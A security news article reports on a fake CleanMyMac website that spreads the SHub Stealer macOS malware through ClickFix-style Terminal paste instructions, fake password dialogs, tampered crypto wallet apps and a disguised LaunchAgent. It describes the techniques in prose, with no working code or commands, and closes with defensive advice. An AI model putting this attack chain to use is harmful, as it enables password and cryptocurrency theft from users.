Fake CleanMyMac Website Spreads SHub Stealer Through ClickFix Terminal Trick

Mac users searching for a trusted system optimization tool are being targeted in a new malware campaign that impersonates the popular macOS utility CleanMyMac. Security researchers warn that a fraudulent website is distributing SHub Stealer, a credential-stealing malware capable of harvesting passwords and compromising cryptocurrency wallets.

The campaign relies heavily on social engineering. Instead of exploiting technical vulnerabilities, attackers convince victims to manually run a malicious command in the macOS Terminal, allowing the malware to install while appearing to be part of a legitimate setup process.

A ClickFix-Style Terminal Attack

The attack uses a technique known as ClickFix, in which users are instructed to copy and execute commands themselves. The fake website mimics installation instructions for CleanMyMac and guides visitors through a series of steps that appear routine for developers or advanced users.

Victims are prompted to open Spotlight Search, launch Terminal, paste a provided installation command, and confirm execution by entering their system password. Once the command runs, the malware begins installing silently in the background.

Because the user executes the command manually, macOS security protections such as Gatekeeper may not flag the activity, allowing the malicious script to run without immediate detection.

Hidden Payload Download

Although the Terminal output references the legitimate CleanMyMac website to reassure the user, the command actually decodes a concealed link that downloads a remote script. That script is immediately executed and installs SHub Stealer on the system.

The malware begins by collecting basic information about the infected device, including external IP address, hostname, macOS version, keyboard layout, and a unique identifier assigned to the compromised machine.

Geofencing Avoids Russian Systems

One of the first checks performed by the malware involves detecting the system’s keyboard language settings. If a Russian-language keyboard layout is found, the malware exits immediately and reports the blocked attempt back to its command-and-control infrastructure.

This type of geofencing is commonly used by cybercriminal groups operating in Russian-speaking regions, as avoiding infections within those jurisdictions can reduce the risk of local law enforcement scrutiny.

Password Harvesting Through Fake System Prompts

After the initial installation stage, SHub Stealer attempts to escalate its access by collecting the user’s system password. The malware downloads an AppleScript payload that closes the Terminal window and displays a dialog box that closely resembles a legitimate macOS authentication prompt.

The dialog claims that “System Preferences” requires authentication and requests the user’s password. If entered, the malware verifies the password using macOS system tools and can retry the request multiple times until valid credentials are obtained.

Once attackers obtain the password, they can access the macOS Keychain, which stores saved website passwords, Wi-Fi credentials, application tokens, and private encryption keys.

Targeting Cryptocurrency Wallets

In addition to collecting browser credentials and system data, SHub Stealer specifically targets cryptocurrency wallets installed on macOS devices. Researchers observed the malware modifying several widely used wallet applications, including Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite.

The modifications enable attackers to display fraudulent security prompts inside the wallet interface. Victims may be asked to enter their recovery seed phrase under the guise of verifying or restoring wallet access. Once entered, the seed phrase is transmitted to attacker-controlled servers, enabling the theft of cryptocurrency funds.

Persistence Through a Fake Google Updater

To maintain long-term access to the infected device, SHub installs a persistent background task using a macOS LaunchAgent. The component is disguised as a Google software updater and configured to run every minute.

Each time it executes, the task launches a hidden script that maintains communication with the attacker’s command-and-control infrastructure, allowing the operators to collect additional data or deliver new commands to the compromised system.

Growing Targeting of macOS Users

Security researchers note that macOS users are increasingly becoming targets of credential-stealing malware, particularly campaigns focused on cryptocurrency theft and browser session hijacking. Recent incidents have involved malware disguised as AI software installers, podcast invitations, and even browser extensions.

These campaigns highlight a shift in the threat landscape as attackers recognize the growing number of macOS users managing digital assets and sensitive data on their devices.

How Users Can Stay Safe

Security experts recommend downloading software only from official developer websites or the Mac App Store and avoiding installation instructions found on unfamiliar websites. Users should also be cautious about copying and executing commands in Terminal unless they fully trust the source.

As this campaign demonstrates, even a single pasted command can give attackers complete control of a system if it is executed without verification.